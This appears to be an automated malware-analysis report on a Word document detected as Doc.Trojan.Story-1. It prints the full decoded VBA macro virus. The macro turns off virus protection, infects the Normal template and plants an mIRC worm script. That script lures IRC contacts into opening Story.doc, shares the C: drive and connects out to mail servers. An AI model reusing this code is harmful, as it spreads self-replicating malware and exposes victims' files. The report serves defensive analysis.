Office (OLE) malware analysis — malicious · 22975253df201382

MALICIOUS

Office (OLE)

37.0 KB Created: 2008-07-09 21:48:00 Authoring application: Microsoft Word 11.3.5 First seen: 2014-09-26

MD5: b2a48c1c03e7310ec79b1afe797de7e8 SHA-1: b64b47cea9c2253b636d6933fec138b9aee8c9d0 SHA-256: 22975253df2013822411ac80b07340079ecb4a334b0cc979dafaba3583384e45

250 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that exhibit self-replication behavior, attempting to copy its code into the Normal template and the active document. It also attempts to modify mIRC configuration files, suggesting an intent to establish persistence or spread. The embedded PDF also shows suspicious static findings, indicating a multi-stage malicious approach.

Heuristics 7

ClamAV: Doc.Trojan.Story-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Story-1
Secondary embedded PDF body has suspicious static findings critical POLYGLOT_CHILD_PDF_STATIC_TRIAGE

A valid PDF body was found at a nonzero offset inside another container and its carved contents matched PDF exploit or lure heuristics. This catches polyglots where the top-level magic routes to ZIP/OLE while a PDF reader or downstream parser opens the hidden PDF payload.
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
VCode = CnI.CodeModule.Lines(2, CnI.CodeModule.CountOfLines)
If InA = 1 Then BnI.CodeModule.AddFromString ("Private Sub Document_Close" & Chr(13) & VCode)
If InB = 1 Then AnI.CodeModule.AddFromString ("Private Sub Document_Open" & Chr(13) & VCode)
```

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next

Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL

The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6973 bytes
SHA-256: `3a3b2f552dbe453fb957bd78e5aa050a4fff76831d90e361085edb6180be2a21`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next 'Jack-In-The-Box Set Something = Options Something.VirusProtection = 0 Something.ConfirmConversions = 0 Something.SaveNormalPrompt = 0 Application.EnableCancelKey = 0 Application.StatusBar = 0 Application.ScreenUpdating = 0 Set AnI = ActiveDocument.VBProject.VBComponents(1) Set BnI = NormalTemplate.VBProject.VBComponents(1) If UCase(AnI.CodeModule.Lines(3, 1)) = "'JACK-IN-THE-BOX" Then InA = 1 If UCase(BnI.CodeModule.Lines(3, 1)) = "'JACK-IN-THE-BOX" Then InB = 1 If InA = 1 And InB = 1 Then Exit Sub Set CnI = MacroContainer.VBProject.VBComponents.Item(1) VCode = CnI.CodeModule.Lines(2, CnI.CodeModule.CountOfLines) If InA = 1 Then BnI.CodeModule.AddFromString ("Private Sub Document_Close" & Chr(13) & VCode) If InB = 1 Then AnI.CodeModule.AddFromString ("Private Sub Document_Open" & Chr(13) & VCode) NormalTemplate.Save somename = ActiveDocument.Name DoEvents If InB = 1 Then If Dir("C:\mirc\mirc32.exe") <> "" Then var3 = "C:\mirc\script.ini" If System.PrivateProfileString("C:\mirc\mirc.ini", "warn", "fserve") <> "" Then System.PrivateProfileString("C:\mirc\mirc.ini", "warn", "fserve") = "off" If System.PrivateProfileString("C:\mirc\mirc.ini", "fileserver", "warning") <> "" Then System.PrivateProfileString("C:\mirc\mirc.ini", "fileserver", "warning") = "off" If Dir(var3) <> "" Then Kill var3 Open "C:\mirc\script.ini" For Output As #1 Print #1, "[script]" Print #1, "n0=On 1:Connect:{ .notify SimpleSmn \| Set %var7 $rand(1,8) \| If ( %var7 = 1 ) { Set %var8 mirc.com } \| If ( %var7 = 2 ) { Set %var8 georgecarlin.com } \| If ( %var7 = 3 ) { Set %var8 carrottop.com } \| If ( %var7 = 4 ) { Set %var8 anvdesign.net } \| If ( %var7 = 5 ) { Set %var8 symantec.com } \| If ( %var7 = 6 ) { Set %var8 drsolomon.com } \| If ( %var7 = 7 ) { Set %var8 www.bocklabs.wisc.edu } \| If ( %var7 = 8 ) { Set %var8 ebay.com } \| Set %var9 $rand(1,4) \| If ( %var9 = 1 ) { Set %var10 evrt@avp.com } \| If ( %var9 = 2 ) { Set %var10 samples@datafellows.com } \| If ( %var9 = 3 ) { Set %var10 virus_research@nai.com } \| If ( %var9 = 3 ) { Set %var10 tech_support@nai.com } \| If ( $exists(C:\Windows\script1.ini) = $true ) { .remove C:\Windows\script1.ini } \| .copy C:\mirc\script.ini C:\Windows\script1.ini \| .load -rs C:\Windows\script1.ini \| .write -c C:\mirc\script.ini [script] \| .reload -rs C:\mirc\script.ini }" Print #1, "n1=On 1:Input::{ Set %var1 $1- \| If ( $upper(%var1) = /BY ) { .echo 1Mirc Worm 4Jack-In-The-Box \| .echo 12< 9< 12< 9By SimpleSimon 12> 9> 12> \| halt } }" Print #1, "n2=On 1:Notify:{ .timer3 1 10 { .clear -s } \| If ( $nick == SimpleSmn ) { .msg SimpleSmn I'm on irc. \| halt } \| .timer1 1 15 { .notify -r $nick \| .ignore $nick \| .timer9 1 5 { .msg $nick Hey, I can't talk right now but I wanted to send you this file. It has a funny story you should read, and also has macros inside that protect you from a lot of viruses. Just open the document, enable the macros, and if you are infected it will get rid of the virus } \| .timer2 1 15 { .dcc send $nick C:\Windows\Story.doc } } \| .timer 1 16 { .notify \| .clear -s } }" Print #1, "n3=On 1:Unotify: .clear -s" Print #1, "n4=On 1:Join:#: if (help isin $chan) \|\| (nohack isin $chan) { .part $chan } \| If ( $exists(C:\mirc\script.ini) = $true ) { .remove C:\mirc\script.ini }" Print #1, "n5=On 1:Filercvd:.: If ( $me != $nick ) { .dcc send $nick C:\Windows\Story.doc }" Print #1, "n6=On 1:Invite:#:{ .ignore $nick \| .timer 1 10 { .join # } \| .timer 1 15 { .msg $nick Thanks for the invite } \| .timer 1 20 { .msg $nick I'm a little busy so I can't talk much now. I thought you might want to look at this file I got. It has a funny story and also has macros in it which get rid of any macro viruses. Just enable the macros when the prompt comes up and it will scan for any viruses and clean them. } \| .timer 1 25 { .dcc send $nick C:\Windows\Story.doc } }" DoEvents Print #1, "n7=On 1:Notice:Simplicity:: .fserve $nick 100 C:\" Print #1, "n8=On 1:Text:script:: .ignore $nick" Print #1, "n9=On 1:Text:worm:: .ignore $nick" Print #1, "n10=On 1:Text:virus:: .ignore $nick" Print #1, "n11=On 1:Text:infect:: .ignore $nick" Print #1, "n12=On 1:Text:JackBox:: .ignore $nick" Print #1, "n13=On 1:Text:macro:: .ignore $nick" Print #1, "n14=On 1:Text:Story.doc: .ignore $nick" Print #1, "n15=On 1:Text:Hi::{ .timer1 1 5 { .sockclose virc \| .sockopen virc %var8 25 } }" DoEvents Print #1, "n16=On 1:Text:!::{ .timer1 1 5 { .sockclose virc \| .sockopen virc %var8 25 } }" Print #1, "n17=On 1:Text:Hey::{ .timer1 1 5 { .sockclose virc \| .sockopen virc %var8 25 } }" Print #1, "n18=On 1:Text:Hello:*:{ .timer1 1 5 { .sockclose virc \| .sockopen virc %var8 25 } }" Print #1, "n19=On 1:Sockopen:virc:{ Unset %var2 \| Unset %var4 \| Unset %var6 \| Set %var1 $rand(3, 8) + 1 \| Set %loop 1 \| Set %var3 0 \| :check1 \| If ( %loop = %var1 ) { goto out } \| If ( %var3 = 0 ) { Set %var2 %var2 $rand(A, Z) } \| If ( %var3 = 1 ) { Set %var4 %var4 $rand(A, Z) } \| If ( %var3 = 2 ) { Set %var6 %var6 $rand(A, Z) } \| If ( %var3 = 2 ) && ( $rand(1, 3) = 2 ) { Set %var6 %var6 $chr(225) } \| inc %loop \| goto check1 \| :out \| If ( %var3 = 0 ) { Set %var3 1 \| Set %var1 $rand(3, 8) \| Set %loop 1 \| goto check1 } \| If ( %var3 = 1 ) { Set %var3 2 \| Set %var1 $rand(5, 50) \| Set %loop 1 \| goto check1 } \| Set %var2 $remove(%var2, $chr(32) ) \| Set %var4 $remove(%var4, $chr(32) ) \| Set %var5 %var2 @ %var4 .com \| Set %var5 $remove(%var5, $chr(32) ) \| Set %var6 $remove(%var6, $chr(32) ) \| Set %var6 $replace(%var6, $chr(225), $chr(32) ) \| If ( %var7 = 6 ) { .sockwrite -n virc Helo %var2 } \| .sockwrite -n virc mail from: %var5" Print #1, "n20=If ( $sockerr != 0 ) { halt } \| .sockwrite -n virc rcpt to: %var10 \| .sockwrite -n virc data \| .sockwrite -n virc To: %var10 \| .sockwrite -n virc From: %var5 \| .sockwrite -n virc Subject: %var6 \| .sockwrite -n virc Jack-In-The-Box Has Popped Up Again! \| .sockwrite -n virc . \| .sockwrite -n virc Quit \| .sockclose virc }" Print #1, "n21=On 1:Disconnect:{ If ( $exists(C:\mirc\script.ini) = $true ) { .remove C:\mirc\script.ini } \| If ( $exists(C:\Windows\script1.ini) = $true ) { .copy C:\Windows\script1.ini C:\mirc\script.ini \| .remove C:\Windows\script1.ini } }" Close #1 If Dir("C:\windows\Story.doc") = "" Then ActiveDocument.SaveAs FileName:="C:\Windows\Story.doc", AddToRecentFiles:=False End If End If If Left(somename, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument End If CommandBars("Tools").Controls("Macro").Enabled = 0 CommandBars("Tools").Controls("Customize...").Enabled = 0 CommandBars("View").Controls("Toolbars").Enabled = 0 CommandBars("View").Controls("Status Bar").Enabled = 0 End Sub
`icc_00_off00000209.icc`	pdf-icc-profile	PDF ICC profile at offset 0x209	1456 bytes
SHA-256: `2a18161bb96fd584d19e737ce294732789e0e8e6ae8c8e4e5f09f1b138232a63`
`polyglot_child_pdf_off00002648.pdf`	polyglot-child-pdf	Secondary PDF body inside ole container at offset 0x2648	28088 bytes
SHA-256: `7b42316f93f432e451d780222a8f9472be28865d251f1e0d6685672c1e85080b`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 8 Chr/ChrW string-construction calls.

Open this report in the interactive analyzer, or submit your own file for analysis.